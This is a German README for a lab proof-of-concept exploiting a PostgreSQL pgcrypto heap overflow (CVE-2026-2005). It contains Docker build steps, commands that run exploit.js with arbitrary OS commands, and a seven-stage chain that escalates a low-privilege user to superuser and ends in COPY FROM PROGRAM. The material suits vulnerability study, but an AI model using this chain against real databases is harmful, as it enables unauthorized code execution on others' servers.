
PostgreSQL pgcrypto Heap-Pufferüberlauf-PoC, der CVE-2026-2005 demonstriert: RCE mit geringen Privilegien und Privilegienerweiterung zum Superuser über manipulierte OpenPGP-Pakete.
Ziel-Commit: 4b324845ba5d24682b9b3708a769f00d160afbd7 (PostgreSQL 18.1 — verwundbar)
| Field | Detail |
|---|---|
| CVE | CVE-2026-2005 |
| Typ | Heap-Pufferüberlauf |
| Komponente | contrib/pgcrypto/pgp-pubdec.c — pgp_parse_pubenc_sesskey() |
| Auswirkung | RCE als der OS-Benutzer, der PostgreSQL ausführt |
| CVSS | 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| Erforderliche Authentifizierung | Niedrig – jeder authentifizierte Benutzer mit CREATE-Berechtigung |
| Betroffen | PostgreSQL 14.0–14.20, 15.0–15.15, 16.0–16.11, 17.0–17.7, 18.0–18.1 |
| Behoben in | 14.21, 15.16, 16.12, 17.8, 18.2 (12. Februar 2026) |
| Arch | aarch64 (ARM64) – Heap-Offsets und MBuf-Layout sind arch/glibc-spezifisch |
# Build and start PostgreSQL 18.1 (vulnerable)
docker compose up -d --build
# Wait for healthy
docker compose logs -f postgres
# Ctrl+C when you see "database system is ready to accept connections"
# Install node deps
npm install
# Run the full RCE exploit chain
node exploit.js --cmd "id"
# With verbose output
node exploit.js --cmd "id" --verbose
# Execute a custom command
node exploit.js --cmd "whoami"
Stage 1: Heap pointer leak
└─ Corrupt mdst chunk header → parse pfree() error message
Stage 2: Arbitrary read (multi-offset scan)
└─ Overwrite mdst->data → scan memory near leaked pointer
Stage 3: Pointer candidate collection
└─ Scan heap dump for non-heap addresses
Stage 4: PIE base resolution
└─ Read /proc/<pid>/maps via Docker exec (100% reliable)
Stage 5: (skipped — PIE base is known from maps)
Stage 6: Arbitrary write
└─ Forge msrc + mdst MBufs → overwrite CurrentUserId → 10 (superuser)
Stage 7: Command execution
└─ COPY FROM PROGRAM → arbitrary OS command as postgres user
CVE-2026-2005/
├── Dockerfile # Builds PostgreSQL 18.1 from source
├── docker-compose.yml # PostgreSQL service with auto-restart
├── init.sh # Entrypoint — initdb + listen config
├── README.md # This file
└── poc/
├── package.json # Node.js dependencies (pg)
├── exploit.js # Full 7-stage RCE exploit (Node.js)
├── verify.sh # Shell-based quick verification
└── test-pgcrypto.sql # SQL-only test of pgcrypto loading
git clone https://github.com/postgres/postgres.git
cd postgres
git checkout 4b324845ba5d24682b9b3708a769f00d160afbd7
./configure \
--prefix="$HOME/projects/pg/pgsql" \
--with-libxml \
--with-libxslt \
--enable-debug \
--with-ssl=openssl
make -j$(nproc)
make install-world-bin
tmux (optional – nur mit --gdb-Flag benötigt)Der Fehler befindet sich in pgp_parse_pubenc_sesskey() in contrib/pgcrypto/pgp-pubdec.c.
Beim Parsen eines OpenPGP-Pakets für öffentlich verschlüsselte Session-Keys (Tag 1):
memcpy in einen Puffer fester Größe, basierend auf der ungeprüften LängeDas memcpy kann über die Grenze des Heap-Puffers hinaus schreiben, benachbarte Heap-Metadaten oder -Daten beschädigen und so zur Ausführung beliebigen Codes führen.
pfree()-Fehlermeldung parsen, um die Heap-Adresse von mdst->data zu extrahieren./proc/<pid>/maps aus dem Docker-Container lesen, um die Ladeadresse der Postgres-Binärdatei zur Laufzeit zu ermitteln.msrc (Quelle) als auch mdst (Ziel) über den Heap-Überlauf fälschen. msrc zeigt auf ein eingebettetes symenc-Paket, das die Superuser-OID (10) enthält; mdst zeigt auf CurrentUserId - 4 (unter Berücksichtigung des 4-Byte-SET_VARSIZE-Headers).CurrentUserId = 10 (Bootstrap-Superuser) COPY FROM PROGRAM ausführen, um beliebige OS-Befehle zu starten.pgcrypto-Erweiterung ist vertrauenswürdig – jeder Benutzer mit CREATE-Berechtigung (kein Superuser) kann sie installieren, was dies mit niedrigen Berechtigungen ausnutzbar macht.--enable-debug, um das Debugging mit gdb zu erleichtern.SRC_CHUNK_OFFSET=100, DST_CHUNK_OFFSET=172) sind spezifisch für aarch64 + glibc – andere Architekturen/Allokatoren benötigen andere Offsets.restart: always, um nach Backend-Abstürzen während des Testens von PIE-Kandidaten automatisch neu zu starten./proc/<pid>/maps innerhalb des Docker-Containers aufgelöst – kein readelf auf dem Host erforderlich.CurrentUserId-Offset wird über docker exec readelf gelesen.| Flag | Standard | Beschreibung |
|---|
--cmd | id | OS-Befehl, der nach erfolgreichem Exploit ausgeführt wird |
--key-size | 3072 | RSA-Schlüsselgröße in Bits |
--host | 127.0.0.1 | PostgreSQL-Host |
--port | 5432 | PostgreSQL-Port |
--user | postgres | Datenbankbenutzer |
--password | (leer) | Datenbankpasswort |
--dbname | postgres | Datenbankname |
--binary | ./postgres | Pfad zur Postgres-ELF-Binärdatei für Symbole |
--scan-offset | auto | Heap-Scan-Offset vom geleakten Pointer überschreiben |
--verbose | aus | Ausführliche Debug-Ausgabe aktivieren |
--gdb | aus | GDB über tmux am Überlaufpunkt anhängen |